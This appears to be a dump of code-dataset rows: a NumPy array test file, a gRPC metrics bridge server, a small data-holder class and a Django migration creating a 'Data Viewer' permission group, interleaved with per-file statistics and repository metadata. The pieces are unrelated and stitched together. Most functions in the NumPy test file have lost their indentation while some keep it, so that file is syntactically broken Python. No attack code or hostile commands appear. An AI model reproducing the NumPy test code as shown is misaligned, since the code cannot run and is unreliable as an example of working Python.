x = np.arange(0,32, dtype= np.int16)
print("X")
print(x)
print(x.shape)
y = np.delete(x, 1,0)
print("Y")
print(y)
print(y.shape)
print("X")
print(x)
def test_ndarray_delete3(self):
    """Drop column 0 of an 8x4 array via a boolean mask rather than np.delete."""
    x = np.arange(0,32, dtype= np.int16).reshape(8,4)
    print("X")
    print(x)
    print(x.shape)
    # np.bool was an alias for the builtin and was removed in NumPy 1.24;
    # use the builtin bool so this test runs on current NumPy.
    mask = np.ones_like(x, dtype=bool)
    mask[:,[0]] = False
    print(mask)
    y = x[mask].reshape(8,3)
    print("Y")
    print(y)
    print(y.shape)
    print("X")
    print(x)
def test_ndarray_unique_1(self):
x = np.array([1,2,3,1,3,4,5,4,4]);
print("X")
print(x)
uvalues, indexes, inverse, counts = np.unique(x, return_counts = True, return_index=True, return_inverse=True);
print("uvalues")
print(uvalues)
print("indexes")
print(indexes)
print("inverse")
print(inverse)
print("counts")
print(counts)
def test_ndarray_unique_2(self):
x = np.array([1,2,3,1,98,97,96,94,3,4,5,4,4,1,9,6,9,11,23,9,5,0,11,12]).reshape(6,4);
print("X")
print(x)
uvalues, indexes, inverse, counts = np.unique(x, return_counts = True, return_index=True, return_inverse=True, axis=0);
print("uvalues")
print(uvalues)
print("indexes")
print(indexes)
print("inverse")
print(inverse)
print("counts")
print(counts)
uvalues, indexes, inverse, counts = np.unique(x, return_counts = True, return_index=True, return_inverse=True, axis=1);
print("uvalues")
print(uvalues)
print("indexes")
print(indexes)
print("inverse")
print(inverse)
print("counts")
print(counts)
def test_ndarray_where_1(self):
x = np.array([1,2,3,1,3,4,5,4,4]).reshape(3,3)
print("X")
print(x)
y = np.where(x == 3)
print("Y")
print(y)
def test_ndarray_where_2(self):
x = np.array([1,2,3,1,3,4,5,4,4], dtype=np.int32).reshape(3,3)
print("X")
print(x)
y = np.where(x == 3)
print("Y")
print(y)
z = x[y]
print("Z")
print(z)
def test_ndarray_where_3(self):
x = np.arange(0, 1000, dtype=np.int32).reshape(-1,10)
#print("X")
#print(x)
y = np.where(x % 10 == 0)
#print("Y")
#print(y)
z = x[y]
print("Z")
print(z)
def test_ndarray_where_4(self):
x = np.arange(0, 3000000, dtype=np.int32)
#print("X")
#print(x)
y = np.where(x % 7 == 0)
print("Y")
print(y)
z = x[y]
m = np.mean(z);
print("M")
print(m)
def test_ndarray_where_5(self):
a = np.arange(10)
b = np.where(a < 5, a, 10*a)
print(b)
a = np.array([[0, 1, 2], [0, 2, 4], [0, 3, 6]])
b = np.where(a < 4, a, -1) # -1 is broadcast
print(b)
c = np.where([[True, False], [True, True]],
[[1, 2], [3, 4]],
[[9, 8], [7, 6]])
print(c)
def test_ndarray_unpackbits_1(self):
x = np.arange(0,12, dtype=np.uint8).reshape(3,-1)
print("X")
print(x)
y = np.unpackbits(x, 1);
print("Y")
print(y)
z = np.packbits(y, 1)
print("Z")
print(z)
def test_arange_slice_1(self):
a = np.arange(0, 1024, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
b = a[:,:,122]
print("B")
print(b)
print(b.shape)
print(b.strides)
c = a[:,:,[122]]
print("C")
print(c)
print(c.shape)
print(c.strides)
c2 = np.arange(0,8, dtype=np.int16).reshape(2,4,1);
print("C2")
print(c2)
print(c2.shape)
print(c2.strides)
d = a[:,:,[122,123]]
print("D")
print(d)
print(d.shape)
print(d.strides)
def test_arange_slice_2(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
# b has unexpected strides. If a copy from A is made first
b = a[:,:,[2]]
print("B")
print(b)
print(b.shape)
print(b.strides)
def test_arange_slice_2A(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
# b has unexpected strides. If a copy from A is made first
b = a[:,:, np.where(a > 20)]
print("B")
print(b)
print(b.shape)
print(b.strides)
def test_arange_slice_2B(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
b = np.arange(100, 132, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
# b has unexpected strides. If a copy from A is made first
b[:,:,[2]] = a[:,:,[2]]
print("B")
print(b)
print(b.shape)
print(b.strides)
def test_arange_slice_2C(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
b = np.arange(100, 132, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
b[:,:,[2]] |= a[:,:,[2]]
print("B")
print(b)
print(b.shape)
print(b.strides)
def test_arange_slice_2C2(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
b = np.arange(100, 132, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
# b has unexpected strides. If a copy from A is made first
aarray = a[:, :, [2]]
barray = b[:, :, [2]]
carray = barray | aarray
print("B")
print(carray)
print(carray.shape)
print(carray.strides)
def test_ndarray_NAN(self):
    """Create a 1-D float array and fill it with NaN."""
    _max = 5
    # np.float was removed in NumPy 1.24 (use the builtin float) and np.NaN
    # was removed in NumPy 2.0 (use np.nan).
    output = np.ndarray(shape=(_max,), dtype = float);
    output[:] = np.nan;
    print(output)
    print(output.shape)
def test_insert_1(self):
a = np.array([[1, 1], [2, 2], [3, 3]])
b = np.insert(a, 1, 5);
c = np.insert(a, 0, [999,100,101])
print(a)
print(a.shape)
print("B")
print(b)
print(b.shape)
print(b.strides)
print("C")
print(c)
print(c.shape)
print(c.strides)
def test_insert_2(self):
#print(np.source(np.insert))
a = np.array([1, 1, 2, 2, 3, 3])
b = np.array([90, 91, 92, 92, 93, 93])
c = np.insert(a, slice(None), b);
#d = nptest.insert(a, slice(None), b);
print(a)
print(a.shape)
print("B")
print(b)
print(b.shape)
print(b.strides)
print("C")
print(c)
print(c.shape)
print(c.strides)
#print(d)
#print(d.shape)
def test_append_1(self):
a = np.array([[1, 1], [2, 2], [3, 3]])
b = np.append(a, 1);
print(a)
print(a.shape)
print(b)
print(b.shape)
print(b.strides)
def test_append_2(self):
a = np.array([[1, 1], [2, 2], [3, 3]])
b = np.append(a, [4,4]);
print(a)
print(a.shape)
print(b)
print(b.shape)
print(b.strides)
def test_append_3(self):
a = np.array([[1, 1], [2, 2], [3, 3]])
b = np.array([[4, 4], [5, 5], [6, 6]])
c = np.append(a, b);
print(a)
print(a.shape)
print(b)
print(b.shape)
print(c)
print(c.shape)
print(c.strides)
def test_append_4(self):
a = np.array([1, 1, 2, 2, 3, 3]).reshape(2,-1)
b = np.array([4, 4, 5, 5, 6, 6]).reshape(2,-1)
c = np.append(a, b, axis=1)
print(a)
print(a.shape)
print("")
print(b)
print(b.shape)
print("")
print(c)
print(c.shape)
print(c.strides)
print("")
def test_append_msever_1(self):
arr = np.array([[1,2,3],[4,5,6]])
row = np.array([7,8,9])
arr = np.append(arr,[row],axis= 0)
print(arr)
def test_tuple_msever_2(self):
a = np.array((1,2,3))
print(a)
b = np.array((2,3,4))
print(b)
c = np.column_stack((a,b))
print(c)
def test_slice_msever_1(self):
a=np.array([[1,3,0],[0,0,5]])
col1 = a[:,0]
col2 = a[:,1]
col3 = a[:,2]
print(col1)
print(col2)
print(col3)
def test_hsplit_msever_1(self):
a=np.array([[1,3,0],[0,0,5]])
row, col = np.hsplit(np.argwhere(a),2)
print(row)
print(col)
def test_take_msever_1(self):
testVector = np.array([ 1.011163, 1.01644999999999, 1.01220500000001, 1.01843699999999, 1.00985100000001, 1.018964, 1.005825, 1.016707, 8.11556899999999, 1.010744, 1.01700600000001, 1.01323099999999, 1.010389, 1.015216, 1.015418, 1.01704600000001, 1.01191, 1.01164299999999, 1.01062400000001, 1.014199, 1.012952, 1.017645, 1.01591999999999, 1.018655, 1.00942400000001, 1.012852, 1.010543, 1.02000700000001, 1.008196, 1.01396099999999 ]);
testVector2 = testVector.reshape(15, 2);
testDataMode1 = np.array([ 1, 2, 2, 3, 4, 7, 9 ]);
print(testVector2);
print(testDataMode1);
print("np.take()");
testTake = np.take(testVector2, testDataMode1.astype(np.intp), axis=0);
print(testTake);
testVector3 = np.arange(0.0, 30000.0, 0.5, dtype= np.float64);
testVector4 = testVector3.reshape(30000, 2);
testIndex = np.arange(0, 30000, 100, dtype= np.intp);
print("test BIG np.take()");
# testBigTake = np.take(testVector4, testIndex, axis: 0);
testBigTake = np.zeros((300, 2), dtype= np.float64);
testBigTake = np.take(testVector4, testIndex, axis= 0);
print(testIndex);
print(testBigTake);
print(np.diff(testIndex));
print(np.diff(testBigTake, axis= 0));
def test_flat_1(self):
x = np.arange(10, 16).reshape(2,3);
print(x)
x.flat[3] = 9
print(x)
print(x.shape)
print(x.strides)
z = x.flat[3]
print(z)
print("")
print("indexes")
print("")
for zz in x.flat:
print(zz);
def test_flat_2(self):
x = np.arange(1, 7).reshape(2, 3)
print(x)
print(x.flat[3])
print(x.T)
print(x.T.flat[3])
x.flat = 3
print(x)
x.flat[[1,4]] = 1
print(x)
def test_intersect1d_1(self):
a = np.array([ 1, 3, 4, 3 ])
b = np.array([ 3, 1, 2, 1 ])
c = np.intersect1d(a,b)
print(c)
def test_setxor1d_1(self):
a = np.array([1, 2, 3, 2, 4])
b = np.array([2, 3, 5, 7, 5])
c = np.setxor1d(a,b)
print(c)
def test_in1d_1(self):
test = np.array([0, 1, 2, 5, 0])
states = [0, 2]
mask = nptest.in1d(test, states)
print(mask)
print(test[mask])
mask = np.in1d(test, states, invert=True)
print(mask)
print(test[mask])
def test_isin_1(self):
element = 2*np.arange(4).reshape((2, 2));
print(element)
test_elements = [1, 2, 4, 8]
mask = np.isin(element, test_elements)
print(mask)
print(element[mask])
print("***********")
mask = np.isin(element, test_elements, invert=True)
print(mask)
print(element[mask])
def test_union1d_1(self):
a = np.union1d([-1, 0, 1], [-2, 0, 2])
print(a)
def test_Ellipsis_indexing_1(self):
a = np.array([10.0, 7, 4, 3, 2, 1])
b = a[..., -1]
print(b)
print("********")
a = np.array([[10.0, 7, 4], [3, 2, 1]])
c = a[..., -1]
print(c)
print("********")
TestData = [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 ]
a = np.array(TestData, dtype= np.uint32).reshape((1, 3, 2, -1, 1));
d = a[..., -1]
print(d)
print("********")
e = a[0, ..., -1]
print(e)
print("********")
f = a[0, :,:,:, -1]
print(f)
print("********")
g = a[0, 1, ..., -1]
print(g)
print("********")
h = a[0, 2, 1, ..., -1]
print(h)
print("********")
i = a[:, 2, 1, 1, ...]
print(i)
def test_concatenate_1(self):
a = np.array([[1, 2], [3, 4]])
b = np.array([[5, 6]])
c = np.concatenate((a, b), axis=0)
print(c)
d = np.concatenate((a, b.T), axis=1)
print(d)
e = np.concatenate((a, b), axis=None)
print(e)
f = np.concatenate((np.eye(2), np.ones((2, 2))), axis = 0)
print(f)
g = np.concatenate((np.eye(2), np.ones((2, 2))), axis = 1)
print(g)
def test_concatenate_2(self):
#a = np.array([1, 2, 3, 4, 5,6])
#c = np.concatenate(a, axis=0)
#d = np.concatenate((a), axis=0)
#print(a.shape)
#print(c.shape)
#print(d.shape)
#print("**********")
a = np.array([[[[1, 2], [3, 4], [5,6]]]])
c = np.concatenate(a, axis=0)
d = np.concatenate((a), axis=0);
print(a.shape)
print(c.shape)
print(d.shape)
print("**********")
a = np.array([[[[1, 2], [3, 4], [5,6]]]]).reshape((2,3,1,1))
c = np.concatenate(a, axis=0)
d = np.concatenate((a[0], a[1]), axis=0)
print(a.shape)
print(c.shape)
print(d.shape)
print("**********")
a = np.array([[[[1, 2], [3, 4], [5,6]]]])
c = np.concatenate(a, axis=1)
d = np.concatenate((a[0]), axis=0);
print(a.shape)
print(c.shape)
print(d.shape)
print("**********")
a = np.array([[[[1, 2], [3, 4], [5,6]]]]).reshape((3,2,1,1))
c = np.concatenate(a, axis=1)
d = np.concatenate((a[0], a[1], a[2]), axis=1)
print(a.shape)
print(c.shape)
print(d.shape)
#d = np.concatenate(a, axis=1)
#print(d)
#e = np.concatenate(a, axis=None)
#print(e)
def test_concatenate_3(self):
a = np.array([[[[1, 2], [3, 4], [5,6]]]])
c = np.concatenate(a, axis=-1)
print(c)
d = np.concatenate(a, axis=-2)
print(d)
c = np.concatenate((a,a,a), axis=-1)
print(c)
d = np.concatenate((a,a,a), axis=-2)
print(d)
def test_newaxis_ufunc_1(self):
x = np.arange(0, 4, 1, float)
y = x.reshape(4,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(4,1,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(4,1,1,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(1,4,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(1,4,1, 1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
def test_newaxis_ufunc_2(self):
x = np.arange(0, 4, 1, dtype=np.float32).reshape(2,2);
y = x.reshape(2,2,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(2,2,1,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(2,2,1,1,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(1,2,2,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(1,2,2,1, 1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
def test_newaxis_ufunc_3(self):
x1 = np.array([1, 2, 3, 4, 5])
x2 = np.array([5, 4, 3])
x1_new = x1[:, np.newaxis]
z = x1_new + x2
print(z)
print("*************")
x1_new = x1[np.newaxis,:, np.newaxis]
z = x1_new + x2
print(z)
print("*************")
x2_new = x2[:, np.newaxis]
z = x1 + x2_new
print(z)
print("*************")
x2_new = x2[:, np.newaxis, np.newaxis]
z = x1 + x2_new
print(z)
def test_newaxis_ufunc_4(self):
x1 = np.array([1, 2, 3, 4, 5])
x2 = np.array([5, 4, 3])
x2_new = x2[:, np.newaxis]
z = x2_new + x1
print(z)
print("*************")
x2_new = x2[np.newaxis,:, np.newaxis]
z = x2_new + x1
print(z)
print("*************")
x2_new = x2[:, np.newaxis]
z = x2_new + x1
print(z)
print("*************")
x2_new = x2[:, np.newaxis, np.newaxis]
z = x2_new + x1
print(z)
def test_fields_1(self):
data = np.zeros(4, dtype={'names':('name', 'age', 'weight'),'formats':('U10', 'i4', 'f8')})
print(data.dtype)
# Run the unittest test runner when this file is executed as a script.
if __name__ == '__main__':
    unittest.main()
| 22.02111 | 445 | 0.47449 | 4,116 | 28,165 | 3.188533 | 0.079446 | 0.040232 | 0.018668 | 0.026516 | 0.666032 | 0.596007 | 0.552728 | 0.52263 | 0.487732 | 0.461292 | 0 | 0.087215 | 0.342127 | 28,165 | 1,279 | 446 | 22.02111 | 0.62108 | 0.027694 | 0 | 0.582686 | 0 | 0 | 0.042159 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0899 | false | 0 | 0.006659 | 0 | 0.097669 | 0.54495 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
6c17ef0176e106352590096d7278e535b50ea838 | 1,016 | py | Python | relaax/server/common/bridge/metrics_bridge_server.py | deeplearninc/relaax | a0cf280486dc74dca3857c85ec0e4c34e88d6b2b | [
"MIT"
] | 71 | 2017-01-25T00:26:20.000Z | 2021-02-17T12:39:20.000Z | relaax/server/common/bridge/metrics_bridge_server.py | deeplearninc/relaax | a0cf280486dc74dca3857c85ec0e4c34e88d6b2b | [
"MIT"
] | 69 | 2017-01-23T19:29:23.000Z | 2018-08-21T13:26:39.000Z | relaax/server/common/bridge/metrics_bridge_server.py | deeplearninc/relaax | a0cf280486dc74dca3857c85ec0e4c34e88d6b2b | [
"MIT"
] | 13 | 2017-01-23T21:18:09.000Z | 2019-01-29T23:48:30.000Z | from __future__ import absolute_import
from builtins import object
import concurrent
import grpc
from . import bridge_pb2
from . import bridge_message
class MetricsBridgeServer(object):
    """gRPC server that exposes the metrics bridge service on a given bind.

    Wraps a grpc.Server with the Bridge servicer attached; `start()` begins
    serving (non-blocking — grpc runs its own worker threads).
    """

    def __init__(self, bind, metrics_server):
        """Build the server.

        bind -- tuple formatted as '%s:%d', i.e. (host, port)
        metrics_server -- object whose set_x/metrics the Servicer forwards to
        """
        # BUGFIX: the module-level `import concurrent` does not guarantee the
        # `concurrent.futures` submodule is loaded, so the attribute access
        # below could raise AttributeError; import the submodule explicitly.
        import concurrent.futures
        # Single worker thread: incoming metric updates are serialized.
        self.server = grpc.server(
            concurrent.futures.ThreadPoolExecutor(max_workers=1))
        bridge_pb2.add_BridgeServicer_to_server(
            Servicer(metrics_server), self.server)
        self.server.add_insecure_port('%s:%d' % bind)

    def start(self):
        """Start serving; returns immediately."""
        self.server.start()
class Servicer(bridge_pb2.BridgeServicer):
    """Bridge servicer that forwards RPC calls to a metrics server object."""

    def __init__(self, metrics_server):
        self.metrics_server = metrics_server

    def SetX(self, request, context):
        """Forward the x value from the request to the metrics server."""
        self.metrics_server.set_x(request.x)
        return bridge_pb2.NullMessage()

    def StoreMetric(self, request_iterator, context):
        """Deserialize a streamed metric call and dispatch it by name.

        The deserialized payload is a dict with 'method' (attribute name on
        metrics_server.metrics) and 'kwargs' (keyword arguments to pass).
        """
        payload = bridge_message.BridgeMessage.deserialize(request_iterator)
        handler = getattr(self.metrics_server.metrics, payload['method'])
        handler(**payload['kwargs'])
        return bridge_pb2.NullMessage()
| 31.75 | 87 | 0.73622 | 122 | 1,016 | 5.836066 | 0.393443 | 0.127809 | 0.095506 | 0.064607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007101 | 0.168307 | 1,016 | 31 | 88 | 32.774194 | 0.835503 | 0 | 0 | 0.086957 | 0 | 0 | 0.016732 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.26087 | 0 | 0.652174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c19350eb655afa6ac646081689cf640b03c440f | 846 | py | Python | WIMLib/Resources/Result.py | jknewson/WiMLib | f9f74b29ed1dfc901b31e3df81f9f2459918dc4e | [
"CC0-1.0",
"MIT"
] | null | null | null | WIMLib/Resources/Result.py | jknewson/WiMLib | f9f74b29ed1dfc901b31e3df81f9f2459918dc4e | [
"CC0-1.0",
"MIT"
] | 1 | 2018-07-26T15:06:31.000Z | 2018-07-26T15:06:31.000Z | WIMLib/Resources/Result.py | jknewson/WiMLib | f9f74b29ed1dfc901b31e3df81f9f2459918dc4e | [
"CC0-1.0",
"MIT"
] | 1 | 2022-01-11T14:52:52.000Z | 2022-01-11T14:52:52.000Z | #------------------------------------------------------------------------------
#----- Result.py --------------------------------------------------------------
#------------------------------------------------------------------------------
#
# copyright: 2016 WiM - USGS
#
# authors: Jeremy K. Newson - USGS Web Informatics and Mapping (WiM)
#
# purpose: Data holder code
#
# usage: THIS SECTION NEEDS TO BE UPDATED
#
# discussion: THIS SECTION NEEDS TO BE UPDATED
#
# dates: 01 DEC 2016 jkn - Created / Date notation edited by jw
#
#------------------------------------------------------------------------------
#region "Imports"
import json
#endregion
class Result(object):
    """Simple data holder: an identifier, a free-text description, and a
    dict of named values (empty until populated by the caller)."""

    def __init__(self, identifier, descr=""):
        # Each instance gets its own (initially empty) value map.
        self.Values = {}
        self.Description = descr
        self.ID = identifier
6c1e76ff354ea7d48556e2b24380b9a671a44043 | 2,576 | py | Python | mep/common/migrations/0007_add_data_viewer_group.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | 3 | 2020-05-12T19:19:41.000Z | 2021-04-07T13:56:32.000Z | mep/common/migrations/0007_add_data_viewer_group.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | 736 | 2017-06-21T16:24:42.000Z | 2022-02-26T17:46:10.000Z | mep/common/migrations/0007_add_data_viewer_group.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.2.11 on 2020-03-11 18:30
from django.contrib.auth.management import create_permissions
from django.db import migrations
# Per-app lists of "view" permission codenames granted to the Data Viewer
# group.  Keys are Django app labels; values are Permission.codename strings
# looked up by create_data_viewer_group below.
data_viewer_perms = {
    'accounts': [
        'view_account',
        "view_address",
        'view_accountaddress',
        'view_borrow',
        'view_event',
        'view_purchase',
        'view_reimbursement',
        'view_subscription',
        'view_subscriptiontype'
    ],
    'books': [
        'view_publisher',
        'view_publisherplace',
        'view_creator',
        'view_creatortype',
        'view_work',
        'view_edition',
        'view_editioncreator',
    ],
    'footnotes': [
        'view_bibliography',
        'view_footnote',
        'view_sourcetype'
    ],
    'people': [
        'view_country',
        'view_infourl',
        'view_person',
        'view_profession',
        'view_relationship',
        'view_relationshiptype'
    ],
    # djiffy is a third-party app; its view permissions may exist twice
    # (it previously defined its own), which is why lookups use filter().
    'djiffy': [
        'view_manifest',
        'view_canvas',
    ]
}
def create_data_viewer_group(apps, schema_editor):
    """Create a 'Data Viewer' auth group holding the view permissions
    listed in data_viewer_perms."""
    Group = apps.get_model('auth', 'Group')
    Permission = apps.get_model('auth', 'Permission')

    # Permissions are normally created by a post-migrate signal; when all
    # migrations run in one pass they may not exist yet, so force their
    # creation for every installed app before looking them up.
    for app_config in apps.get_app_configs():
        app_config.models_module = True
        create_permissions(app_config, apps=apps, verbosity=0)
        app_config.models_module = None

    group, _created = Group.objects.get_or_create(name='Data Viewer')

    wanted = []
    for app_label, codenames in data_viewer_perms.items():
        for codename in codenames:
            # filter() rather than get(): djiffy permissions can exist
            # twice (the app previously defined its own view permissions),
            # so attach every match.
            wanted.extend(Permission.objects.filter(
                codename=codename, content_type__app_label=app_label))
    group.permissions.set(wanted)
def remove_data_viewer_group(apps, schema_editor):
    """Reverse migration: delete the 'Data Viewer' group (the underlying
    permissions themselves are left in place)."""
    group_model = apps.get_model('auth', 'Group')
    group_model.objects.filter(name='Data Viewer').delete()
class Migration(migrations.Migration):
    # Data migration: adds a read-only "Data Viewer" auth group.
    # Reversible — RunPython's reverse_code deletes the group again.

    dependencies = [
        ('common', '0006_update_content_editor_perms_works_and_djiffy'),
    ]

    operations = [
        migrations.RunPython(create_data_viewer_group,
                             reverse_code=remove_data_viewer_group)
    ]
| 28.94382 | 74 | 0.638587 | 280 | 2,576 | 5.603571 | 0.5 | 0.063735 | 0.038241 | 0.030593 | 0.072658 | 0.072658 | 0.072658 | 0.072658 | 0.072658 | 0.072658 | 0 | 0.011099 | 0.265528 | 2,576 | 88 | 75 | 29.272727 | 0.818182 | 0.14868 | 0 | 0.089552 | 1 | 0 | 0.244505 | 0.041667 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.029851 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.